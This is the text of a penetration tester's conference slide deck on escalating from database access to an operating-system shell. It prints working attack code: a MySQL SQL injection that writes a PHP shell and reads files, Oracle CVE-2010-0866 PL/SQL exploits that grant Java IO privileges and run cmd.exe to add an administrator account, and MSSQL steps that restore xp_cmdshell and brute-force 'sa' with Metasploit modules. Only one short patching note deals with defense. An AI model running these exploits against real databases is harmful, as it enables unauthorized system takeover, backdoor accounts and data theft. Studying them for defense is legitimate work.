1. Rock'n Roll in Database
Security
Prathan Phongthiproek (Lucifer@CITEC)
Senior Information Security Consultant
ACIS ProfessionalCenter
2. Who am I ?
CITEC Evolution
Code Name “Lucifer”, Moderator, Speaker
Instructor: Web Application (In) Security 101
Instructor: Mastering in Exploitation
ACIS ProfessionalCenter
RedTeam : Penetration Tester
Instructor / Speaker
Security Consultant / Researcher
Founder of CWH Underground Hacker
Exploits,Vulnerabilities, Papers Disclosure
Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc
http://www.exploit-db.com/author/?a=1275
3. Let’sTalk !?
“Get DBA privilege is good but get SHELL is better !!”
MySQL PWNED !! From Web Application to get SHELL
Oracle Escalating Privilege XPL For get SHELL
MSSQL Credentials Attack For get SHELL
5. MySQL Jump into OS
MySQL5.xVulnerability, 0-Day on Immunity CANVAS
SQL Injection viaWeb Application (Top Hit !!)
MySQL Outfile Function
Need writable directory
Need Absolute path
Need Magic_quote off
Union select 1,‘code’,3,4 into outfile “/www/htdocs/shell.php”
MySQL Load_file Function (Better !!)
Need Absolute path
Need phpMyAdmin path or MySQL 3306 was opened at firewall
Union select 1,load_file(0x4332…………)
8. Oracle Escalating Privilege XPL For get
SHELL
DBMS_JVM_EXP_PERMS package that allow any user create
privilege to grant themselves java IO Privileges
CVE-2010-0866
Affect Oracle 10g-11g (Windows Only)
Defense
Apply October 2010 Critical Patch Update
Oracle 11gR2 onWindows still secure
Revoke privileges from users to execute
DBMS_JVM_EXP_PERMS
9. Oracle Escalating Privilege XPL For get
SHELL
XPL Code (Grant JAVA IO Privilege)
DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS
SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission',’<<ALL
FILES>>','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT
INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;
DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS
SELECT 'GRANT',USER(),
'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM
DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE
C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;
DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS
SELECT 'GRANT',USER(),
'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM
DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE
C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;
10. Oracle Escalating Privilege XPL For get
SHELL
XPL Code (OS Execute)
select
DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:windows
system32cmd.exe', '/c', ’net user prathan 1234 /add’) from dual;
select
DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:windows
system32cmd.exe', '/c', ’net localgroup administrators prathan /add’) from
dual;
12. MSSQL CredentialsAttack For get SHELL
‘SA’ is God Account, Run with SYSTEM Privilege onWindows
Default ‘sa’ password is blank password or guessable
Require “xp_cmdshell” stored procedures (Disable by default
on MSSQL 2005+)
Enabled it with osql
On MSSQL 2005
EXEC sp_configure ‘show advanced options’, 1
RECONFIGURE
EXEC sp_configure ‘xp_cmdshell’, 1
RECONFIGURE
13. MSSQL CredentialsAttack For get SHELL
On MSSQL 2000
Xp_cmdshell was drop by sp_dropextendedproc
EXEC sp_addextendedproc ‘xp_anyname’, ‘xp_log70.dll’
CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result
14. MSSQL CredentialsAttack For get SHELL
Brute-Force ‘sa’ password and use sa credentials to run os
command on target machine with Metasploit modules
Scanner/mssql/mssql_ping
Scanner/mssql/mssql_login
Admin/mssql/mssql_exec
Windows/smb/psexec